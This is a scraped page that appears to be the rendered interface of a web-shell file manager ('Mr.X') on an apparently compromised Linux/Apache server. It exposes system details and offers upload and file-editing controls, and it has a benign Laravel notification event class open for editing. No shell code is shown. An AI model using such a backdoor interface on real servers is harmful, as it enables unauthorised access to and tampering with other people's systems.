🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:NotificationFailed.php
<?php namespace Illuminate\Notifications\Events; use Illuminate\Bus\Queueable; use Illuminate\Queue\SerializesModels; class NotificationFailed { use Queueable, SerializesModels; /** * Create a new event instance. * * @param mixed $notifiable The notifiable entity who received the notification. * @param \Illuminate\Notifications\Notification $notification The notification instance. * @param string $channel The channel name. * @param array $data The data needed to process this failure. */ public function __construct( public $notifiable, public $notification, public $channel, public $data = [], ) { } }
Save Changes
Cancel
Create New File
Create New Folder